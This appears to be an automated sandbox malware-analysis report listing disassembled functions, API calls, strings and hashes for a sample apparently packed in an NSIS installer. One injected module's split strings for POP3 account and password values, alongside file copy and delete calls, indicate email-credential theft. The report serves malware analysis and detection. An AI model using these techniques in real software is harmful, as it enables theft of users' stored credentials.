                                      control_flow_graph 553 40395a-403972 call 406626 556 403974-403984 call 406193 553->556 557 403986-4039bd call 40611a 553->557 566 4039e0-403a09 call 403c30 call 405c25 556->566 562 4039d5-4039db lstrcatW 557->562 563 4039bf-4039d0 call 40611a 557->563 562->566 563->562 571 403a9b-403aa3 call 405c25 566->571 572 403a0f-403a14 566->572 578 403ab1-403ad6 LoadImageW 571->578 579 403aa5-403aac call 40626e 571->579 572->571 573 403a1a-403a42 call 40611a 572->573 573->571 580 403a44-403a48 573->580 582 403b57-403b5f call 40140b 578->582 583 403ad8-403b08 RegisterClassW 578->583 579->578 584 403a5a-403a66 lstrlenW 580->584 585 403a4a-403a57 call 405b4a 580->585 594 403b61-403b64 582->594 595 403b69-403b74 call 403c30 582->595 586 403c26 583->586 587 403b0e-403b52 SystemParametersInfoW CreateWindowExW 583->587 592 403a68-403a76 lstrcmpiW 584->592 593 403a8e-403a96 call 405b1d call 40624c 584->593 585->584 591 403c28-403c2f 586->591 587->582 592->593 598 403a78-403a82 GetFileAttributesW 592->598 593->571 594->591 606 403b7a-403b94 ShowWindow call 4065b6 595->606 607 403bfd-403c05 call 405383 595->607 601 403a84-403a86 598->601 602 403a88-403a89 call 405b69 598->602 601->593 601->602 602->593 614 403ba0-403bb2 GetClassInfoW 606->614 615 403b96-403b9b call 4065b6 606->615 612 403c07-403c0d 607->612 613 403c1f-403c21 call 40140b 607->613 612->594 616 403c13-403c1a call 40140b 612->616 613->586 619 403bb4-403bc4 GetClassInfoW RegisterClassW 614->619 620 403bca-403bfb DialogBoxParamW call 40140b call 4038aa 614->620 615->614 616->594 619->620 620->591
                                      APIs
                                        • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                        • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                      • lstrcatW.KERNEL32(00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800,74DF3420,00435000,00000000), ref: 004039DB
                                      • lstrlenW.KERNEL32(004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800), ref: 00403A5B
                                      • lstrcmpiW.KERNEL32(00428198,.exe,004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                      • GetFileAttributesW.KERNEL32(004281A0), ref: 00403A79
                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403AC2
                                        • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                      • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                      • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                      • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                      • DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                      • API String ID: 1975747703-949986762
                                      • Opcode ID: de1469bc4878199ea01b60fec97fd66d0310a25772ab1ef6440d8c2ceb6dcd7b
                                      • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                      • Opcode Fuzzy Hash: de1469bc4878199ea01b60fec97fd66d0310a25772ab1ef6440d8c2ceb6dcd7b
                                      • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                      Function 0040437E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 627 40437e-404390 628 4044b0-4044bd 627->628 629 404396-40439e 627->629 630 40451a-40451e 628->630 631 4044bf-4044c8 628->631 632 4043a0-4043af 629->632 633 4043b1-4043d5 629->633 634 4045e4-4045eb 630->634 635 404524-40453c GetDlgItem 630->635 636 4045f3 631->636 637 4044ce-4044d4 631->637 632->633 638 4043d7 633->638 639 4043de-404459 call 4041e1 * 2 CheckDlgButton call 404203 GetDlgItem call 404216 SendMessageW 633->639 634->636 645 4045ed 634->645 641 4045a5-4045ac 635->641 642 40453e-404545 635->642 640 4045f6-4045fd call 404248 636->640 637->636 643 4044da-4044e5 637->643 638->639 669 404464-4044ab SendMessageW * 2 lstrlenW SendMessageW * 2 639->669 670 40445b-40445e GetSysColor 639->670 652 404602-404606 640->652 641->640 648 4045ae-4045b5 641->648 642->641 647 404547-404562 642->647 643->636 649 4044eb-404515 GetDlgItem SendMessageW call 404203 call 404609 643->649 645->636 647->641 653 404564-4045a2 SendMessageW LoadCursorW SetCursor call 40462d LoadCursorW SetCursor 647->653 648->640 654 4045b7-4045bb 648->654 649->630 653->641 658 4045cd-4045d1 654->658 659 4045bd-4045cb SendMessageW 654->659 663 4045d3-4045dd SendMessageW 658->663 664 4045df-4045e2 658->664 659->658 663->664 664->652 669->652 670->669
                                      APIs
                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040441C
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040444D
                                      • GetSysColor.USER32(?), ref: 0040445E
                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                      • lstrlenW.KERNEL32(?), ref: 0040447F
                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                      • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                      • SendMessageW.USER32(00000000), ref: 00404501
                                      • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                      • SetCursor.USER32(00000000), ref: 00404580
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                      • SetCursor.USER32(00000000), ref: 0040459C
                                      • SendMessageW.USER32(00000111,?,00000000), ref: 004045CB
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                      • String ID: N
                                      • API String ID: 3103080414-1130791706
                                      • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                      • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                      • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                      • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                      Function 23BC173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 671 23bc173a-23bc17fe call 23bcc030 call 23bc2c40 * 2 678 23bc1803 call 23bc1cca 671->678 679 23bc1808-23bc180c 678->679 680 23bc19ad-23bc19b1 679->680 681 23bc1812-23bc1816 679->681 681->680 682 23bc181c-23bc1837 call 23bc1ede 681->682 685 23bc183d-23bc1845 682->685 686 23bc199f-23bc19ac call 23bc1ee7 * 2 682->686 687 23bc184b-23bc184e 685->687 688 23bc1982-23bc1985 685->688 686->680 687->688 690 23bc1854-23bc1881 call 23bc44b0 * 2 call 23bc1db7 687->690 692 23bc1995-23bc1999 688->692 693 23bc1987 688->693 705 23bc193d-23bc1943 690->705 706 23bc1887-23bc189f call 23bc44b0 call 23bc1db7 690->706 692->685 692->686 696 23bc198a-23bc198d call 23bc2c40 693->696 700 23bc1992 696->700 700->692 707 23bc197e-23bc1980 705->707 708 23bc1945-23bc1947 705->708 706->705 722 23bc18a5-23bc18a8 706->722 707->696 708->707 710 23bc1949-23bc194b 708->710 712 23bc194d-23bc194f 710->712 713 23bc1961-23bc197c call 23bc16aa 710->713 715 23bc1955-23bc1957 712->715 716 23bc1951-23bc1953 712->716 713->700 719 23bc195d-23bc195f 715->719 720 23bc1959-23bc195b 715->720 716->713 716->715 719->707 719->713 720->713 720->719 723 23bc18aa-23bc18c2 call 23bc44b0 call 23bc1db7 722->723 724 23bc18c4-23bc18dc call 23bc44b0 call 23bc1db7 722->724 723->724 733 23bc18e2-23bc193b call 23bc16aa call 23bc15da call 23bc2c40 * 2 723->733 724->692 724->733 733->692
                                      APIs
                                        • Part of subcall function 23BC1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D1B
                                        • Part of subcall function 23BC1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23BC1D37
                                        • Part of subcall function 23BC1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D4B
                                      • _strlen.LIBCMT ref: 23BC1855
                                      • _strlen.LIBCMT ref: 23BC1869
                                      • _strlen.LIBCMT ref: 23BC188B
                                      • _strlen.LIBCMT ref: 23BC18AE
                                      • _strlen.LIBCMT ref: 23BC18C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _strlen$File$CopyCreateDelete
                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                      • API String ID: 3296212668-3023110444
                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction ID: 48082d84d74ea9dba936f214ee17cd678e3fb569ad660aca1abae66eab1a1641
                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction Fuzzy Hash: 5F61D271D00398AEEF31DFA4C840BDEB7B9AF69200F5448F6D205B7260DBB45A478B56
                                      Function 23BC19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: %m$~$Gon~$~F@7$~dra
                                      • API String ID: 4218353326-230879103
                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction ID: 67c1435776caa90b191f49e4b1c12d7eb1d9fefacc3e0eeb1824304762ee2981
                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction Fuzzy Hash: B4711771D002A85FCF31DFB48894AEF7BFC9B59600F1448E6E544E7241EA749B86CBA4
                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                      • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                      • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                      • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                      Function 004046B0 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 004046FF
                                      • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                      • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                      • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                      • lstrcmpiW.KERNEL32(004281A0,004236E8,00000000,?,?), ref: 00404817
                                      • lstrcatW.KERNEL32(?,004281A0), ref: 00404823
                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835
                                        • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                        • Part of subcall function 004064E0: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                      • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,?,004216B8,?,?,000003FB,?), ref: 004048F8
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                        • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                        • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                        • Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: A$6B
                                      • API String ID: 2624150263-3505403099
                                      • Opcode ID: afaa8b046b85c6c4999a48e5951142db6eeca15c55dcff4a9d7871d2c438c698
                                      • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                      • Opcode Fuzzy Hash: afaa8b046b85c6c4999a48e5951142db6eeca15c55dcff4a9d7871d2c438c698
                                      • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                      Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                      • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
                                        • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                        • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                      • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
                                      • wsprintfA.USER32 ref: 00405F17
                                      • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,?,00427588,?,?,?,?,?), ref: 00405F52
                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                      • GlobalFree.KERNEL32(00000000), ref: 00406000
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                        • Part of subcall function 00405D3E: GetFileAttributesW.KERNEL32(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                        • Part of subcall function 00405D3E: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                      • String ID: %ls=%ls$[Rename]
                                      • API String ID: 2171350718-461813615
                                      • Opcode ID: 8dac95613b83430ab3c692d209f2e04147d8a9d69613e8c3f61ea45ae8b92b2a
                                      • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                      • Opcode Fuzzy Hash: 8dac95613b83430ab3c692d209f2e04147d8a9d69613e8c3f61ea45ae8b92b2a
                                      • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                      Function 23BC7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 23BC7D06
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC90D7
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC90E9
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC90FB
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC910D
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC911F
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9131
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9143
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9155
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9167
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9179
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC918B
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC919D
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC91AF
                                      • _free.LIBCMT ref: 23BC7CFB
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC7D1D
                                      • _free.LIBCMT ref: 23BC7D32
                                      • _free.LIBCMT ref: 23BC7D3D
                                      • _free.LIBCMT ref: 23BC7D5F
                                      • _free.LIBCMT ref: 23BC7D72
                                      • _free.LIBCMT ref: 23BC7D80
                                      • _free.LIBCMT ref: 23BC7D8B
                                      • _free.LIBCMT ref: 23BC7DC3
                                      • _free.LIBCMT ref: 23BC7DCA
                                      • _free.LIBCMT ref: 23BC7DE7
                                      • _free.LIBCMT ref: 23BC7DFF
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: ed6bf201cf9895fb536eaefd1a73b9469d35e6ff16132d511c0b16c358f4b448
                                      • Instruction ID: eda14e95d68c3ad8bf9014e07a99ebbc27ec0dc967331475fc51c4dd3dfd151d
                                      • Opcode Fuzzy Hash: ed6bf201cf9895fb536eaefd1a73b9469d35e6ff16132d511c0b16c358f4b448
                                      • Instruction Fuzzy Hash: DD314E71600385DFEB31EF39D942B6677E9EF04250F144CBAE859D7561DE31A980CB14
                                      Function 00402EC1 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402ED2
                                      • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                        • Part of subcall function 00405D3E: GetFileAttributesW.KERNEL32(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                        • Part of subcall function 00405D3E: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                      Strings
                                      • soft, xrefs: 00402FAF
                                      • Inst, xrefs: 00402FA6
                                      • Null, xrefs: 00402FB8
                                      • Error launching installer, xrefs: 00402F11
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 4283519449-527102705
                                      • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                      • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                      • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
